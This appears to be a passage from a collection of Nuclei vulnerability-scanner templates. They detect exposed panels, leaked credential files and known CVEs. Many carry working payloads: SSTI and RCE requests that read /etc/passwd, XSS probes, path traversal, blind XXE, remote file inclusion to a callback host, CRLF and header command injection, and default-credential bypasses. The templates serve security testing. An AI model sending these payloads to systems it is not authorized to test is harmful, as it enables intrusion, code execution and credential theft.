onmouseover=alert(document.domain)' 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | part: header 26 | words: 27 | - "text/html" 28 | -------------------------------------------------------------------------------- /laravel-telescope.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-telescope 2 | 3 | info: 4 | name: Laravel Telescope Disclosure 5 | author: geeknik 6 | description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. 
7 | reference: https://laravel.com/docs/8.x/telescope 8 | severity: medium 9 | tags: laravel,disclosure,logs 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/telescope/requests" 15 | 16 | redirects: true 17 | matchers: 18 | - type: word 19 | words: 20 | - "Telescope" 21 | - "Requests" 22 | - "Commands" 23 | - "Schedule" 24 | condition: and 25 | -------------------------------------------------------------------------------- /openstack-user-secrets.yaml: -------------------------------------------------------------------------------- 1 | id: openstack-user-secrets 2 | 3 | info: 4 | name: Openstack User Secrets 5 | author: geeknik 6 | reference: https://github.com/openstack/openstack-ansible/blob/master/etc/openstack_deploy/user_secrets.yml 7 | severity: high 8 | tags: openstack,config,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/user_secrets.yml" 14 | - "{{BaseURL}}/user_secrets.yml.old" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | part: body 23 | words: 24 | - "############################# WARNING" 25 | - "may break your OpenStack environment" 26 | - "#NOTE: Please uncomment those" 27 | condition: and 28 | -------------------------------------------------------------------------------- /cacti-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cacti-detect 2 | info: 3 | name: Detect Cacti 4 | author: geeknik 5 | description: Cacti is a complete network graphing solution -- https://www.cacti.net/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | - "{{BaseURL}}/cacti/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | part: body 21 | words: 22 | - "Login to Cacti" 23 | - "The Cacti Group" 24 | condition: and 25 | 26 | - type: regex 27 | part: header 28 | regex: 29 | - Cacti+ 30 | 31 | 
extractors: 32 | - type: kval 33 | part: header 34 | kval: 35 | - Set-Cookie 36 | -------------------------------------------------------------------------------- /node-nunjucks-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: node-nunjucks-ssti 2 | 3 | info: 4 | name: Node Nunjucks SSTI 5 | description: Nunjucks is a template engine inspired by Jinja2, used to develop web applications on Node.js web frameworks such as Express or Connect. 6 | reference: https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine 7 | author: geeknik 8 | severity: high 9 | tags: node,nunjucks,ssti 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/page?name={{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0:" 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /CVE-2020-24949.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-24949 2 | 3 | info: 4 | name: PHPFusion 9.03.50 Remote Code Execution 5 | author: geeknik 6 | severity: high 7 | description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). 
8 | reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt 9 | tags: cve,cve2020,phpfusion,rce 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(cat /etc/passwd)}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0:" 24 | -------------------------------------------------------------------------------- /huawei-dg8045-auth-bypass.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-dg8045-auth-bypass 2 | 3 | info: 4 | name: Huawei dg8045 - Authentication Bypass 5 | description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device and via the web app API as seen below. 6 | reference: https://www.exploit-db.com/exploits/50059 7 | author: geeknik 8 | severity: high 9 | tags: huawei,dg8045,auth,bypass 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/api/system/deviceinfo" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "DeviceName" 24 | - "SerialNumber" 25 | - "VER.A" 26 | condition: and 27 | -------------------------------------------------------------------------------- /upnp-device.yaml: -------------------------------------------------------------------------------- 1 | id: upnp-device-detect 2 | 3 | info: 4 | name: Detect Basic uPNP Device 5 | author: geeknik 6 | reference: https://www.upnp.org/specs/basic/UPnP-basic-Basic-v1-Device.pdf 7 | severity: info 8 | tags: upnp,iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "urn:schemas-upnp-org:device-1-0" 23 | - "" 24 | - "" 25 | part: body 26 | condition: 
and 27 | 28 | extractors: 29 | - type: regex 30 | name: model 31 | regex: 32 | - .* 33 | - .* 34 | -------------------------------------------------------------------------------- /vscode-sftp.yaml: -------------------------------------------------------------------------------- 1 | id: vscode-sftp 2 | 3 | info: 4 | name: vscode sftp credentials 5 | author: geeknik 6 | description: Created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials 7 | severity: high 8 | tags: vscode,sftp,ssh 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/sftp.json" 14 | - "{{BaseURL}}/.config/sftp.json" 15 | - "{{BaseURL}}/.vscode/sftp.json" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "application/json" 23 | - type: status 24 | status: 25 | - 200 26 | - type: word 27 | words: 28 | - "name" 29 | - "host" 30 | - "protocol" 31 | - "username" 32 | condition: and 33 | -------------------------------------------------------------------------------- /detect-tracer-sc-web.yaml: -------------------------------------------------------------------------------- 1 | id: detect-tracer-sc-web 2 | 3 | info: 4 | name: Detects Tracer SC Web UI 5 | author: geeknik 6 | reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html 7 | severity: info 8 | tags: tracer,trane,iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/hui/index.html" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "Tracer SC" 23 | - "> Tracer SC " 24 | - "By accessing Tracer SC+," 25 | condition: and 26 | - type: word 27 | part: header 28 | words: 29 | - "text/html" 30 | -------------------------------------------------------------------------------- /CVE-2018-16671.yaml: 
-------------------------------------------------------------------------------- 1 | id: CVE-2018-16671 2 | 3 | info: 4 | name: CirCarLife SCADA Device ID 5 | description: System software information disclosure due to lack of authentication 6 | reference: 7 | - https://www.exploit-db.com/exploits/45384 8 | author: geeknik 9 | severity: medium 10 | tags: cve,cve2018,circarlife,scada,iot,disclosure 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/html/device-id" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "CirCarLife Scada" 23 | - type: word 24 | part: body 25 | words: 26 | - "circontrol" 27 | - type: regex 28 | part: body 29 | regex: 30 | - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" 31 | -------------------------------------------------------------------------------- /CVE-2020-23517.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-23517 2 | 3 | info: 4 | name: Aryanic HighMail (High CMS) XSS 5 | author: geeknik 6 | severity: medium 7 | description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. 
8 | reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html 9 | tags: xss,cve,cve2020 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/login/?uid=\">" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - text/html 21 | part: header 22 | - type: word 23 | words: 24 | - " 7 | reference: https://www.exploit-db.com/exploits/49986 8 | severity: high 9 | tags: solarlog 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/lan.html" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | part: header 23 | words: 24 | - "IPC@CHIP" 25 | - type: word 26 | part: body 27 | words: 28 | - " Solare Datensysteme GmbH" 29 | - "mailto:info@solar-log.com" 30 | condition: and 31 | -------------------------------------------------------------------------------- /CVE-2021-3374.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-3374 2 | 3 | info: 4 | name: Rstudio Shiny Server Directory Traversal 5 | author: geeknik 6 | description: Rstudio Shiny-Server prior to 1.5.16 is vulnerable to directory traversal and source code leakage. This can be exploited by appending an encoded slash to the URL. 
7 | reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak 8 | severity: medium 9 | tags: cve,cve2021,rstudio,traversal 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/%2f/" 15 | - "{{BaseURL}}/sample-apps/hello/%2f/" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "Index of /" 25 | - type: regex 26 | part: body 27 | regex: 28 | - "[A-Za-z].*\\.R" 29 | -------------------------------------------------------------------------------- /detect-workerman-websocket-server.yaml: -------------------------------------------------------------------------------- 1 | id: detect-workerman-websocket-server 2 | 3 | info: 4 | name: Detects Workerman websockets server 5 | reference: 6 | - https://www.workerman.net/en/ 7 | - https://github.com/walkor/Workerman 8 | author: geeknik 9 | severity: info 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - 'workerman' 22 | - type: word 23 | part: body 24 | words: 25 | - '

Websocket

' 26 | - 'workerman' 27 | condition: and 28 | - type: status 29 | status: 30 | - 200 31 | extractors: 32 | - type: regex 33 | part: header 34 | name: version 35 | regex: 36 | - 'workerman\/\d\.\d\.\d' 37 | -------------------------------------------------------------------------------- /CVE-2009-4223.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-4223 2 | 3 | info: 4 | name: KR-Web <= 1.1b2 RFI 5 | description: KR is a web content server based on Apache-PHP-MySQL technology which gives internet programmers some PHP classes simplifying database content access. In addition, it gives some admin and user tools to write, hierarchize and authorize contents. 6 | reference: 7 | - https://sourceforge.net/projects/krw/ 8 | - https://www.exploit-db.com/exploits/10216 9 | author: geeknik 10 | severity: high 11 | tags: cve,cve2009,krweb,rfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}/file.txt" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: interactsh_protocol 25 | words: 26 | - "http" 27 | -------------------------------------------------------------------------------- /jetbrains-webservers-xml.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-webservers-xml 2 | 3 | info: 4 | name: Jetbrains IDE WebServers.xml 5 | author: geeknik 6 | description: Created by Jetbrains IDEs, contains webserver credentials with encoded passwords 7 | severity: low 8 | tags: jetbrains,config 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.idea/WebServers.xml" 14 | - "{{BaseURL}}/.idea/webServers.xml" 15 | - "{{BaseURL}}/.idea/webservers.xml" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "application/xml" 23 | - "text/xml" 24 | condition: or 25 | - type: word 
26 | part: body 27 | words: 28 | - "" 31 | - type: status 32 | status: 33 | - 200 34 | -------------------------------------------------------------------------------- /landfill-remote-monitoring-control.yaml: -------------------------------------------------------------------------------- 1 | id: landfill-remote-monitoring-control 2 | 3 | info: 4 | name: SCS Landfill Remote Monitoring Control 5 | description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. 6 | reference: https://www.scsengineers.com/services/remote-monitoring-control/ 7 | author: geeknik 8 | severity: info 9 | tags: panel,scs,rmc,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | redirects: true 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "Log in to SCS RMC®" 25 | - "SCS RMC®" 26 | condition: and 27 | -------------------------------------------------------------------------------- /CVE-2019-15859.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-15859 2 | 3 | info: 4 | name: Socomec DIRIS Password Disclosure 5 | author: geeknik 6 | description: Password disclosure in the web interface on socomec DIRIS A-40 devices before 48250501 allows a remote attacker to get full access to a device via the /password.jsn URI. 
7 | reference: https://seclists.org/fulldisclosure/2019/Oct/10 8 | severity: critical 9 | tags: cve,cve2019,disclosure,socomec,diris,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/password.jsn" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "text/json" 24 | part: header 25 | - type: word 26 | words: 27 | - "username" 28 | - "password" 29 | part: body 30 | condition: and 31 | -------------------------------------------------------------------------------- /CVE-2021-32820.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-32820 2 | 3 | info: 4 | name: File disclosure in Express Handlebars 5 | author: geeknik 6 | description: By allowing template engine configuration options to be passed through the Express render API directly, downstream users of an Express template engine may inadvertently introduce insecure behavior into their applications with impacts ranging from Cross Site Scripting (XSS) to Remote Code Execution (RCE). 7 | reference: https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ 8 | severity: medium 9 | tags: cve,cve2021,express,handlebars,disclosure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/?layout=/etc/resolv.conf" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "nameserver " 24 | -------------------------------------------------------------------------------- /CVE-2007-0885.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2007-0885 2 | 3 | info: 4 | name: Rainbow.Zen Jira XSS 5 | description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. 
6 | reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded 7 | author: geeknik 8 | severity: medium 9 | tags: cve,cve2007,jira,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\">" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "\">" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | part: header 26 | - "text/html" 27 | -------------------------------------------------------------------------------- /spidercontrol-scada-server-info.yaml: -------------------------------------------------------------------------------- 1 | id: spidercontrol-scada-server-info 2 | 3 | info: 4 | name: SpiderControl SCADA Web Server Info Exposure 5 | author: geeknik 6 | description: Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. 7 | reference: https://spidercontrol.net/spidercontrol-inside/ 8 | severity: high 9 | tags: spidercontrol,scada,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/cgi-bin/GetSrvInfo.exe' 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "powered by SpiderControl" 23 | - "LSWEBSERVER" 24 | - "SCWEBSERVICES" 25 | condition: and 26 | extractors: 27 | - type: kval 28 | part: header 29 | kval: 30 | - Server 31 | -------------------------------------------------------------------------------- /monitorix-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: monitorix-exposure 2 | info: 3 | name: Monitorix 4 | author: geeknik 5 | description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible. 
6 | reference: https://www.monitorix.org/ 7 | severity: low 8 | tags: monitorix,exposure,logs 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - "" 21 | - "Global kernel usage" 22 | - "Kernel usage per processor" 23 | - "" 24 | - "1day.png'" 25 | condition: and 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /old-copyright.yaml: -------------------------------------------------------------------------------- 1 | id: old-copyright 2 | 3 | info: 4 | name: Find pages with old copyright dates 5 | author: geeknik 6 | severity: info 7 | tags: misc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 3 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - '2021' 21 | part: body 22 | negative: true 23 | 24 | - type: regex 25 | part: body 26 | regex: 27 | - 'Copyright [1-9]\d*' 28 | - '© [1-9]\d*' 29 | - '© [1-9]\d*' 30 | - '© [1-9]\d*' 31 | extractors: 32 | - type: regex 33 | part: body 34 | name: copyright_year 35 | regex: 36 | - 'Copyright [1-9]\d*' 37 | - '© [1-9]\d*' 38 | - '© [1-9]\d*' 39 | - '© [1-9]\d*' 40 | -------------------------------------------------------------------------------- /yii-debugger.yaml: -------------------------------------------------------------------------------- 1 | id: yii-debugger 2 | 3 | info: 4 | name: View Yii Debugger Information 5 | author: geeknik 6 | reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ 7 | severity: info 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/debug/default/view.html" 13 | - "{{BaseURL}}/debug/default/view" 14 | - "{{BaseURL}}/frontend/web/debug/default/view" 15 | - "{{BaseURL}}/web/debug/default/view" 16 | - 
"{{BaseURL}}/sapi/debug/default/view" 17 | 18 | redirects: true 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "Yii Debugger" 27 | - "Status" 28 | - "Route" 29 | - "Log" 30 | - "Time" 31 | - "Memory" 32 | - "DB" 33 | condition: and 34 | -------------------------------------------------------------------------------- /blind-xxe.yaml: -------------------------------------------------------------------------------- 1 | id: blind-xxe 2 | 3 | info: 4 | name: Blind XXE 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - raw: 10 | - | 11 | POST / HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 15 | Accept-Language: en-US,en;q=0.5 16 | Accept-Encoding: gzip,deflate 17 | Referer: {{BaseURL}} 18 | Content-Type: text/xml 19 | Content-Length: 112 20 | Connection: close 21 | 22 | 23 | 24 | &e1; 25 | 26 | redirects: true 27 | matchers: 28 | - type: word 29 | part: interactsh_protocol 30 | words: 31 | - "dns" 32 | - "http" 33 | condition: or 34 | -------------------------------------------------------------------------------- /viewlinc-crlf-injection.yaml: -------------------------------------------------------------------------------- 1 | id: viewlinc-crlf-injection 2 | 3 | info: 4 | name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. 
5 | author: geeknik 6 | severity: low 7 | reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system 8 | tags: crlf,viewlinc 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" 14 | 15 | matchers-condition: or 16 | matchers: 17 | - type: word 18 | words: 19 | - "Server: viewLinc/5.1.2.367" 20 | - "Set-Cookie: crlfinjection=crlfinjection" 21 | part: header 22 | condition: and 23 | 24 | - type: word 25 | words: 26 | - "Server: viewLinc/5.1.1.50" 27 | - "Set-Cookie: crlfinjection=crlfinjection" 28 | part: header 29 | condition: and 30 | -------------------------------------------------------------------------------- /CVE-2016-0957.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2016-0957 2 | 3 | info: 4 | name: Adobe AEM Console Disclosure 5 | author: geeknik 6 | description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. 
7 | reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html 8 | severity: high 9 | tags: cve,cve2016,adobe,aem 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/system/console?.css" 15 | headers: 16 | Authorization: "Basic YWRtaW46YWRtaW4K" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | words: 25 | - "Adobe" 26 | - "java.lang" 27 | - "(Runtime)" 28 | condition: and 29 | -------------------------------------------------------------------------------- /apache-filename-brute-force.yaml: -------------------------------------------------------------------------------- 1 | id: apache-filename-brute-force 2 | info: 3 | name: Apache Filename Brute Force 4 | author: geeknik 5 | description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. 6 | reference: | 7 | - https://hackerone.com/reports/210238 8 | - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ 9 | severity: low 10 | tags: apache 11 | 12 | requests: 13 | - method: GET 14 | headers: 15 | Accept: "fake/value" 16 | path: 17 | - "{{BaseURL}}/index" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 406 24 | - type: word 25 | words: 26 | - "Not Acceptable" 27 | - "Available variants:" 28 | - "
Apache Server at" 29 | condition: and 30 | -------------------------------------------------------------------------------- /git-mailmap.yaml: -------------------------------------------------------------------------------- 1 | id: git-mailmap 2 | 3 | info: 4 | name: Detect Git Mailmap 5 | author: geeknik 6 | reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html 7 | severity: low 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.mailmap" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])" 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /CVE-2021-31800.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31800 2 | info: 3 | name: impacket directory traversal 4 | author: geeknik 5 | description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key. 
6 | reference: https://github.com/SecureAuthCorp/impacket/commit/49c643bf66620646884ed141c94e5fdd85bcdd2f 7 | severity: high 8 | tags: impacket,cve,cve2021,traversal 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0:" 23 | -------------------------------------------------------------------------------- /header-command-injection.yaml: -------------------------------------------------------------------------------- 1 | id: header-command-injection 2 | 3 | info: 4 | name: Header Command Injection 5 | author: geeknik 6 | severity: high 7 | description: Fuzzing headers for command injection 8 | tags: fuzz,rce 9 | 10 | requests: 11 | - payloads: 12 | header: helpers/payloads/request-headers.txt 13 | payload: helpers/payloads/command-injection.txt 14 | 15 | raw: 16 | - | 17 | GET /?§header§ HTTP/1.1 18 | Host: {{Hostname}} 19 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 20 | §header§: §payload§ 21 | Connection: close 22 | 23 | attack: clusterbomb 24 | redirects: true 25 | matchers-condition: or 26 | matchers: 27 | - type: word 28 | words: 29 | - "uid=" 30 | - "gid=" 31 | - "groups=" 32 | condition: and 33 | 34 | - type: regex 35 | regex: 36 | - "root:[x*]:0:0:" 37 | -------------------------------------------------------------------------------- /CVE-2020-19625.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-19625 2 | info: 3 | name: Gridx 1.3 RCE 4 | author: geeknik 5 | description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. 
6 | reference: https://github.com/oria/gridx/issues/433 7 | severity: high 8 | tags: cve,cve2020,gridx,rce 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "PHP Extension" 23 | - "PHP Version" 24 | condition: and 25 | extractors: 26 | - type: regex 27 | part: body 28 | group: 1 29 | regex: 30 | - '

PHP Version ([0-9.]+)<\/h1>' 31 | -------------------------------------------------------------------------------- /db-schema.yaml: -------------------------------------------------------------------------------- 1 | id: db-schema 2 | 3 | info: 4 | name: Discover db schema files 5 | description: This file is auto-generated from the current state of the database. 6 | author: geeknik 7 | severity: info 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/db/schema.rb" 13 | - "{{BaseURL}}/database/schema.rb" 14 | - "{{BaseURL}}/schema.rb" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "This file is auto-generated from the current state of the database." 21 | - "ActiveRecord::Schema.define" 22 | condition: and 23 | - type: word 24 | part: header 25 | words: 26 | - "text/html" 27 | negative: true 28 | - type: status 29 | status: 30 | - 200 31 | extractors: 32 | - type: regex 33 | name: version 34 | part: body 35 | regex: 36 | - 'version: \d{14}' 37 | -------------------------------------------------------------------------------- /CVE-2021-31537.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31537 2 | 3 | info: 4 | name: SIS-REWE GO version 7.5.0/12C XSS 5 | author: geeknik 6 | description: SIS SIS-REWE Go before 7.7 SP17 allows XSS via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). 
7 | reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ 8 | severity: medium 9 | tags: cve,cve2021,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "" 22 | - type: word 23 | part: header 24 | words: 25 | - "text/html" 26 | -------------------------------------------------------------------------------- /CVE-2014-2321.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2014-2321 2 | 3 | info: 4 | name: ZTE Cable Modem Web Shell 5 | description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. 6 | author: geeknik 7 | reference: 8 | - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ 9 | - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ 10 | severity: high 11 | tags: iot,cve,cve2014,zte 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/web_shell_cmd.gch" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "please input shell command" 23 | - "ZTE Corporation. 
